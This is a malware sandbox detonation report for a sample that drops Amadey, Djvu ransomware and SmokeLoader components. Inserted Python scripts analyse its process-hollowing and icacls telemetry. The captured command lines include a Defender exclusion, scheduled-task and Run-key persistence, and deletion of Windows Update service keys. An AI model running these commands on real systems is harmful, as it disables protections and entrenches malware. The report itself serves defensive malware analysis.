SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2468-347-0x00000000754E0000-0x00000000755F0000-memory.dmp

memory/2932-346-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2468-350-0x00000000754E0000-0x00000000755F0000-memory.dmp

memory/2468-351-0x00000000754E0000-0x00000000755F0000-memory.dmp

memory/2436-354-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe

MD5 24c40e66db640789a022cb839b28d476
SHA1 b6000f4b0e71ce952267e7e5728bc4181877c497
SHA256 6bbcf743fa00cfa33aa60a923d319850111d610b44cfdbe1b5dc6c672f177a8f
SHA512 481240b66ac8eb61b8a9aa6e22e14abdffba7869695c7b92214029a714b619319d3c50bc640e79bf790de309d5a412f4e0fecabc1082acd52d1984c8c8f8f0cd

memory/2436-352-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2192-364-0x0000000000400000-0x0000000002B5D000-memory.dmp

memory/2468-366-0x00000000754E0000-0x00000000755F0000-memory.dmp

memory/2468-367-0x00000000754E0000-0x00000000755F0000-memory.dmp

memory/2468-368-0x00000000754E0000-0x00000000755F0000-memory.dmp

memory/2192-369-0x0000000002D20000-0x0000000002E20000-memory.dmp

memory/2736-371-0x00000000002E0000-0x0000000000371000-memory.dmp

memory/2436-379-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\Temp\2BE7.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2436-383-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2436-395-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe

MD5 24c40e66db640789a022cb839b28d476
SHA1 b6000f4b0e71ce952267e7e5728bc4181877c497
SHA256 6bbcf743fa00cfa33aa60a923d319850111d610b44cfdbe1b5dc6c672f177a8f
SHA512 481240b66ac8eb61b8a9aa6e22e14abdffba7869695c7b92214029a714b619319d3c50bc640e79bf790de309d5a412f4e0fecabc1082acd52d1984c8c8f8f0cd

C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe

MD5 24c40e66db640789a022cb839b28d476
SHA1 b6000f4b0e71ce952267e7e5728bc4181877c497
SHA256 6bbcf743fa00cfa33aa60a923d319850111d610b44cfdbe1b5dc6c672f177a8f
SHA512 481240b66ac8eb61b8a9aa6e22e14abdffba7869695c7b92214029a714b619319d3c50bc640e79bf790de309d5a412f4e0fecabc1082acd52d1984c8c8f8f0cd

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\Temp\2BE7.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 c74b706ecaa058e6e71e7b4b64dff9df
SHA1 5fa641b867716e397c449a7eeae77e37a0c8c804
SHA256 c2520a713db1ddda557dc6d4ace41e12d02bde143df9275e5fcc48a0fea8a21f
SHA512 ab3b626c27dfaf1b991a3f2650e5c0896f248eed4b10ff903047f63fe72874229138c85615ab063904654b2abc0226ad7e7151148b09731dd761a527a8e4a591

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\Temp\1000358001\toolspub2.exe

MD5 932d72dbb9e47863813fde96f1b80bcc
SHA1 f945ba7966a0fa0f006850b76252c8bc8e13d83e
SHA256 73b174c6316230888f3cef2a93ac3f4ba3d35897fa82181cd83beceda6fa7606
SHA512 150b8fc8ba92d008dd80d1328947dec6fb7df09d02eac43e84bd66f0b4f5035d094838ac8f73cdae33ddb7d9a87b9336bef8d3499842ca71e68f60daf0df5dd6

C:\Users\Admin\AppData\Local\Temp\1000359001\3eef203fb515bda85f514e168abb5973.exe

MD5 b79a179e12dd2c67f40297bc597808b0
SHA1 cb1a0ec6f9dbd3ccf6f81a3b4748277fd0c53728
SHA256 504af30f1c8ca0339a2feff60097ed381bbcef9dcbbb26fb1582f57645370fc9
SHA512 0c7ae4f834798c041478190294e789fdc427e58dd991c9a2e63fbc85805d49c91a5bbda5e510da4bcdfc4ca32527677f0cd946d9405ada4c79323944eeefca0d

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-23 11:10

Reported

2023-07-23 11:12

Platform

win10v2004-20230703-en

Max time kernel

30s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A (21 matches, none with a description, indicator, process or target recorded)

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 632 set thread context of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A N/A N/A (62 further matches, none with a description, indicator, process or target recorded)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3164 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 4992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3164 wrote to memory of 4992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4992 wrote to memory of 4280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4992 wrote to memory of 4280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4992 wrote to memory of 4280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 4480 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3164 wrote to memory of 4480 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4480 wrote to memory of 3344 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4480 wrote to memory of 3344 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4480 wrote to memory of 3344 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3164 wrote to memory of 1584 N/A N/A C:\Users\Admin\AppData\Local\Temp\DA46.exe
PID 3164 wrote to memory of 1584 N/A N/A C:\Users\Admin\AppData\Local\Temp\DA46.exe
PID 3164 wrote to memory of 1584 N/A N/A C:\Users\Admin\AppData\Local\Temp\DA46.exe
PID 3164 wrote to memory of 1612 N/A N/A C:\Users\Admin\AppData\Local\Temp\DC99.exe
PID 3164 wrote to memory of 1612 N/A N/A C:\Users\Admin\AppData\Local\Temp\DC99.exe
PID 3164 wrote to memory of 1612 N/A N/A C:\Users\Admin\AppData\Local\Temp\DC99.exe
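The SetThreadContext row earlier in this section and the WriteProcessMemory table above describe the same chain: PID 632 (D476.exe) writes into PID 4376, a second instance of its own image, and then resets that process's thread context. The script below is an added example for this page, not sandbox output and not code from any of the detected families. It parses rows copied from the two tables and correlates them so that only the write-plus-context-switch into a same-image child is reported, while the handful of writes a parent makes into a process it has just created (3164 into 632, 4992 into 4280) are kept as a spawn graph rather than flagged. It assumes the report's whitespace-separated "Description Indicator Process Target" layout and paths without spaces, which holds for every row on this page.

```python
"""Correlate the WriteProcessMemory and SetThreadContext rows of this report.

Added example for this page, not sandbox code and not code from any of the
families detected here. Row layout assumed: the report's
"Description Indicator Process Target" columns, whitespace separated, with
paths that contain no spaces (true for every row on this page).
"""
import re
from collections import defaultdict

# Matches both "PID A wrote to memory of B ..." and "PID A set thread context of B ..."
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<op>wrote to memory of|set thread context of) (?P<dst>\d+)"
    r"\s+(?P<indicator>\S+)\s+(?P<process>\S+)\s+(?P<target>\S+)$"
)

# Constructed subset of the rows in the two tables above (copied verbatim).
SAMPLE_ROWS = r"""
PID 3164 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 4992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4992 wrote to memory of 4280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 set thread context of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 1584 N/A N/A C:\Users\Admin\AppData\Local\Temp\DA46.exe
"""


def parse_rows(text):
    """Yield (src_pid, dst_pid, op, process, target); op is 'write' or 'setctx'."""
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            op = "write" if m["op"].startswith("wrote") else "setctx"
            yield int(m["src"]), int(m["dst"]), op, m["process"], m["target"]


def find_hollowing(text):
    """Return [(src_pid, dst_pid, image)] for parent->child pairs that combine
    WriteProcessMemory with SetThreadContext against a child of the same image.

    A few writes from a parent into a child it has just created also show up for
    ordinary process creation in this telemetry (3164 -> 632 and 3164 -> 4992
    above), so writes alone are not flagged. The write plus a thread-context
    switch into a second copy of its own image is what D476.exe (PID 632) does
    to PID 4376 here, the pattern the SetThreadContext signature fires on.
    """
    ops = defaultdict(set)
    images = {}
    for src, dst, op, process, target in parse_rows(text):
        ops[(src, dst)].add(op)
        images[(src, dst)] = (process, target)
    hits = []
    for (src, dst), seen in sorted(ops.items()):
        process, target = images[(src, dst)]
        if {"write", "setctx"} <= seen and process != "N/A" and process.lower() == target.lower():
            hits.append((src, dst, target))
    return hits


def write_graph(text):
    """Return {src_pid: sorted dst pids} for the write rows. In this report the
    edges line up with the spawn chain (3164, whose image the report leaves as
    N/A, starts D476.exe, regsvr32.exe, DA46.exe and DC99.exe)."""
    graph = defaultdict(set)
    for src, dst, op, _, _ in parse_rows(text):
        if op == "write":
            graph[src].add(dst)
    return {src: sorted(dsts) for src, dsts in graph.items()}


if __name__ == "__main__":
    for src, dst, image in find_hollowing(SAMPLE_ROWS):
        print(f"hollowing candidate: {src} -> {dst} ({image})")
    print(write_graph(SAMPLE_ROWS))
```

Run stand-alone it prints the one candidate (632 -> 4376, D476.exe) and the write graph; feeding it the full tables from the report gives the same single hit, because neither regsvr32 pair nor the 3164 edges ever receive a SetThreadContext row.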

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\D476.exe

C:\Users\Admin\AppData\Local\Temp\D476.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\D6D9.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\D6D9.dll

C:\Users\Admin\AppData\Local\Temp\D476.exe

C:\Users\Admin\AppData\Local\Temp\D476.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\D822.dll

C:\Users\Admin\AppData\Local\Temp\DA46.exe

C:\Users\Admin\AppData\Local\Temp\DA46.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\D822.dll

C:\Users\Admin\AppData\Local\Temp\DC99.exe

C:\Users\Admin\AppData\Local\Temp\DC99.exe

C:\Users\Admin\AppData\Local\Temp\E15C.exe

C:\Users\Admin\AppData\Local\Temp\E15C.exe

C:\Users\Admin\AppData\Local\Temp\E814.exe

C:\Users\Admin\AppData\Local\Temp\E814.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\b5911907-77a3-4c03-af46-51f331b5268b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
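The icacls call above is how the Djvu component protects its working folder: a deny ACE for Everyone (S-1-1-0) that removes Delete (DE) and Delete Child (DC), inherited to files (OI) and subfolders (CI). Because an explicit deny is evaluated before any allow and every logon token carries the Everyone SID, the folder and everything in it cannot be deleted by the user who owns it or by an administrator until the deny entry is removed. The parser below is an added example for this page, not code from the sample or from Microsoft; it decodes that one command line form (one SID, inheritance flags, simple or specific rights, letter meanings as documented for icacls, with the simple-right expansions reduced to the delete-relevant subset) and emits the inverse icacls command.

```python
"""Decode the icacls deny ACE that the Djvu sample puts on its own folder.

Added example for this page, not code from the sample or from Microsoft. It
models only the icacls grammar needed for that command line: a deny or grant
for one SID with inheritance flags and simple or specific rights. The letter
meanings follow the icacls documentation; the simple-right expansions below
are an approximation reduced to the rights this example cares about.
"""
import re

# Command line copied from the process list above.
DJVU_ICACLS = r'icacls "C:\Users\Admin\AppData\Local\b5911907-77a3-4c03-af46-51f331b5268b" /deny *S-1-1-0:(OI)(CI)(DE,DC)'

INHERIT_FLAGS = {"OI": "object inherit (applies to files inside)",
                 "CI": "container inherit (applies to subfolders)",
                 "IO": "inherit only", "NP": "no propagate", "I": "inherited"}
SPECIFIC = {"DE": "delete", "DC": "delete child", "RC": "read control",
            "WDAC": "write DAC", "WO": "write owner", "RD": "read data / list",
            "WD": "write data / add file", "AD": "append data / add subdir",
            "X": "execute / traverse", "RA": "read attributes", "WA": "write attributes"}
# Simple rights, expanded only as far as this example needs (assumption).
SIMPLE = {"F": set(SPECIFIC), "M": {"RD", "WD", "AD", "X", "RA", "WA", "DE", "RC"},
          "RX": {"RD", "X", "RA", "RC"}, "R": {"RD", "RA", "RC"},
          "W": {"WD", "AD", "WA"}, "D": {"DE"}}
WELL_KNOWN_SIDS = {"S-1-1-0": "Everyone", "S-1-5-32-544": "BUILTIN\\Administrators"}

ICACLS_RE = re.compile(
    r'^icacls\s+"(?P<path>[^"]+)"\s+/(?P<mode>deny|grant(?::r)?)\s+'
    r'\*?(?P<sid>[^:\s]+):(?P<perm>\S+)$', re.IGNORECASE)
PAREN_RE = re.compile(r"\(([^)]*)\)")


def parse_icacls(cmdline):
    """Turn one icacls /deny or /grant command line into a dict describing the ACE."""
    m = ICACLS_RE.match(cmdline.strip())
    if not m:
        raise ValueError("not an icacls grant/deny command line: " + cmdline)
    groups = PAREN_RE.findall(m["perm"])
    inherit = [g.upper() for g in groups if g.upper() in INHERIT_FLAGS]
    rights = set()
    for g in groups:
        if g.upper() in INHERIT_FLAGS:
            continue
        for token in g.split(","):
            token = token.strip().upper()
            if token in SIMPLE:
                rights |= SIMPLE[token]
            elif token in SPECIFIC:
                rights.add(token)
            else:
                raise ValueError("unknown icacls right: " + token)
    sid = m["sid"]
    return {"path": m["path"], "mode": m["mode"].lower(), "sid": sid,
            "principal": WELL_KNOWN_SIDS.get(sid, sid), "inherit": inherit, "rights": rights}


def blocks(ace, wanted):
    """True if the ACE denies every right in `wanted` ({"DE"}: delete the object,
    {"DC"}: delete a child of a directory). Explicit deny ACEs sit ahead of allow
    ACEs in a canonical DACL and Everyone is in every logon token, so this deny
    stops deletion for the owner and administrators alike; only the DACL itself
    can still be rewritten (the owner's implicit WRITE_DAC, or take-ownership
    by an elevated administrator)."""
    return ace["mode"] == "deny" and set(wanted) <= ace["rights"]


def remediation(ace):
    """icacls command that strips the denied rights for that SID from the folder
    and, with /T, from everything beneath it (numeric SIDs need the * prefix)."""
    sid_arg = "*" + ace["sid"] if ace["sid"].upper().startswith("S-1-") else ace["sid"]
    return f'icacls "{ace["path"]}" /remove:d {sid_arg} /T'


if __name__ == "__main__":
    ace = parse_icacls(DJVU_ICACLS)
    print(ace["principal"], "denied", sorted(ace["rights"]), "inherit", ace["inherit"])
    print("delete folder denied:", blocks(ace, {"DE"}), "delete child denied:", blocks(ace, {"DC"}))
    print(remediation(ace))
```

The CACLS chain that oneetx.exe runs later in the process list uses the older cacls grammar (/P replaces the ACL unless /E is given) and is not covered by this parser.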

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\F95B.exe

C:\Users\Admin\AppData\Local\Temp\F95B.exe

C:\Users\Admin\AppData\Local\Temp\FCE6.exe

C:\Users\Admin\AppData\Local\Temp\FCE6.exe

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\recognizerespond.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\recognizerespond.exe

C:\Users\Admin\AppData\Local\Temp\F95B.exe

C:\Users\Admin\AppData\Local\Temp\F95B.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\D476.exe

"C:\Users\Admin\AppData\Local\Temp\D476.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\F95B.exe

"C:\Users\Admin\AppData\Local\Temp\F95B.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\D476.exe

"C:\Users\Admin\AppData\Local\Temp\D476.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\F95B.exe

"C:\Users\Admin\AppData\Local\Temp\F95B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe

"C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe"

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

"C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe"

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build3.exe

"C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build3.exe"

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build3.exe

"C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1612 -ip 1612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1584 -ip 1584

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 1248

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1248

